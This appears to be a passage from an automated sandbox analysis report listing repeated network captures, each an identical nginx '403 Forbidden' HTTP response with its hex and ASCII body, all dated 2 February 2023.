            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:40 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:41 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:43 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:44 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:45 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:46 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:47 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
